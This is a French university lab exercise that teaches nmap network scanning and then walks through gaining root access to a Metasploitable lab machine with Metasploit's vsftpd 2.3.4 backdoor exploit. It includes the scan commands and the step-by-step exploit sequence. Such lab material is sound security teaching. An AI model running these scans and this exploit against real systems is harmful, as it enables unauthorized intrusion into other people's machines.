Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 1
TP2: Le Scanning Réseau et le Gain d'accès
I. Le Scanning Réseau
Dans cette première partie du TP nous allons découvrir les services
de base de l'un des outils de scan réseau le plus répondu, on parle
de nmap.
Nmap (Network mapper) est un scanner réseau permettant de
récupérer des informations sur des hôtes ou des services qui tournent sur des hôtes faisant
parti du réseau interne ou externe.
Pour information:
Il existe d'autres outils de scan tel que: superscan, Angry IP Scanner, etc.
Il existe une interface graphique de nmap appelée "zenmap", cependant, dans ce TP
nous allons utiliser nmap en ligne de commande.
Attention /!\: Vous n'avez pas le droit de scanner des IPs et/ou domaines qui ne vous
appartiennent pas.
nmap a créé un serveur pour faire des tests sur domaine c'est le domaine: [Link]
1) Pour chacune des commandes suivantes répondez aux questions suivantes:
a) Que fait la commande ?
b) En quoi la commande est-elle utile pour un attaquant ?
Les commandes doivent être lancer avec le shell root.
nmap -sP <IP de la victime>
nmap -sP <une autre IP du réseau>
nmap -sS <IP de la victime>
nmap -sV <IP de la victime>
nmap -p 80,443 <IP de la victime>
nmap -sV -p 80,443 <IP de la victime>
nmap -sV -p 80,443 <IP de la victime> -A
2) Quels sont les différents états (stat) de ports retournés par nmap ?
Autres commandes:
nmap -sV -p 80,443 <IP de la victime> > [Link]
nmap -6 <IPv6 de la victime>
nmap -sC -p 80 <IP de la victime>
Enseignante: Nesrine KHERNANE
Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 1
Vous pouvez scanner plus qu'une seule adresse IP en utilisant l'une des méthodes suivantes:
[Link]-100
192.168.12.*
[Link]/24
II. Le gain d'accès
Dans cette deuxième partie nous allons utiliser Metasploit framework
1) Relancer la commande nmap -sV <IP de la victime>
Donner le service, la version ainsi que l'état du port 21
2) Lancer l'interface console avec la commande "msfconsole"
3) Lancer la commande "search vsftp" et dites ce que vous remarquez.
4) Lancer la commande "info exploit/unix/ftp/vsftpd_234_backdoor" . Quelle information
peut-on voir après le lancement de cette commande ?
5) Utilisation de l'exploit:
Lancer la commande "use exploit/unix/ftp/vsftpd_234_backdoor "
Lancer la commande "show options" et dites pourquoi cette commande est-elle
importante ?
Lancer la commande "set RHOSTS <IP de la victime>"
Relancer "show options" et dites ce que vous remarquez.
Lancer l'exploit avec la commande "exploit"
A cette étape vous avez gagner l'accès à la machine victime et vous êtes sur la machine
de la victime.
Taper la commande qui vous permet de voir le chemin sur lequel vous êtes sur la
machine de la victime
Taper la commande "cd root"
rendez vous sur la machine de la victime (Metasploitable) et taper "ls"
Revenez à la machine Kali et Taper la commande qui vous permet de créer un fichier
"[Link]"
rendez vous sur la machine de la victime (Metasploitable) et taper "ls", que
remarquez vous ?
Enseignante: Nesrine KHERNANE